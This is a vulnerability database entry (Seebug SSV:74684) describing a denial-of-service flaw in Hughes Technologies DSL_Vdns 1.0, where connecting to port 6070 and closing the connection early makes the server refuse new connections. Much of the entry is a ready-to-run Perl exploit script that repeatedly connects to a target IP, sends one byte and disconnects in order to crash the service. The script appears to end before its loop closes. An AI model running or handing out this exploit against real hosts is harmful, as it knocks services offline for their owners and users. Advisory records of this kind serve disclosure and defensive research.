Hughes Technologies DSL_Vdns 1.0 - Denial of Service Vulnerability

ID SSV:74684
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00


No description provided by source.


It is possible for a remote user to cause a denial of service on a host running DSL_Vdns. Submitting data to port 6070 and closing the connection before the request is fulfilled, will cause DSL_Vdns to enter a 'Default.Closed' state; therefore, refusing any new connections. 

# VDNS.PL - Crashes Virtual DNS Server 1.0
# Written by nemesystm of the DHC
# -
use Socket;

die "$0 - Stops Virtual DNS Server 1.0.
written by nemesystm of the DHC - neme-dhc\
usage: perl $0\n" if !defined $ARGV[0];

for ($count = 0; $count <= 3; $count++) {
        $serverIP = inet_aton($ARGV[0]);
        $serverAddr = sockaddr_in(6070, $serverIP);
        socket(CLIENT, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
        if (connect (CLIENT, $serverAddr)) {
                send (CLIENT, "A", 0);
                close (CLIENT);
        } else { print ("if the number shown is 2, it worked"); die "Can't connect: $count\n"; }